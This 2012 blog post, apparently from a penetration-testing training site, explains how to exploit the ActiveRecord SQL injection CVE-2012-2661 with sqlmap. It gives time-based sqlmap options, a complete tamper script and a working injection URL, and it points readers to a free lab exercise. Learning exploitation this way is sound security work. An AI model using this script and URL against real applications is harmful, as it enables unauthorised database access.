Monday, 18 June 2012

CVE-2012-2661 exploitation with sqlmap

First to understand this bug exploitation, you should probably read my first article CVE-2012-2661: exploitation write-up

After some work, I managed to get the ActiveRecord bug to work with sqlmap...

First some notes on sqlmap:

  • I'm pretty disappointed by how the tamper scripts works, it will be nicer to have access to the full HTTP request instead of just the payload... maybe a patch to submit. If I had full access to the HTTP request, I'd have been able to do a full rewrite from id=1 to the right payload... anyway 
  • It's really time consuming to do time based exploitation since sqlmap doesn't try to go under 1 second for the sleep()...

So first some options I'm using:
  • --tamper tamper/cve-2012-2661.py : My tampering script, see below
  • --dbms=Mysql : The back-end is Mysql, no time wasted on other checks
  • --technique=T : Time based exploitation only,  no time wasted on other checks
  • --batch : I don't want to answer questions... 
  • --proxy=http://127.0.0.1:18080 : Always use a proxy for debugging purpose
  • --banner: I just want to dump the version


The tampering script is pretty simple to write:
  • You need to make sure the request is unique: I'm using the current time, random isn't unique, time is ;)
  • You need to take care of the encoding when using tamper script

And the source code of the tamper script is:
% cat tamper/cve-2012-2661.py
#!/usr/bin/env python

"""
Copyright (c) 2012 pentesterlab (https://www.pentesterlab.com)
"""

from lib.core.enums import PRIORITY
from datetime import datetime
import urllib 

__priority__ = PRIORITY.LOW

def tamper(payload):
    retVal = payload
    # that's disgusting, encoding =,+,>
    retVal = retVal.replace("=","%3d")
    retVal = retVal.replace("+","%2b")
    retVal = retVal.replace(">","%3e")
    # make the request unique
    return retVal+"/*"+str(datetime.now())+"*/"


Now, you just need to find the correct URL... and that's the hard part. After a lot of testing, the following URL works: 

http://vulnerable/?id[information_schema%20where%201%3d1*%20%3b%20--%20.user][1]=1

Now you're able to test and exploit this bug using sqlmap...

If you want to have a real understanding of the vulnerability and not just ./hack ... You should check out PentesterLab's free exercise on this bug:  CVE-2012-2661: ActiveRecord SQL injection


No comments: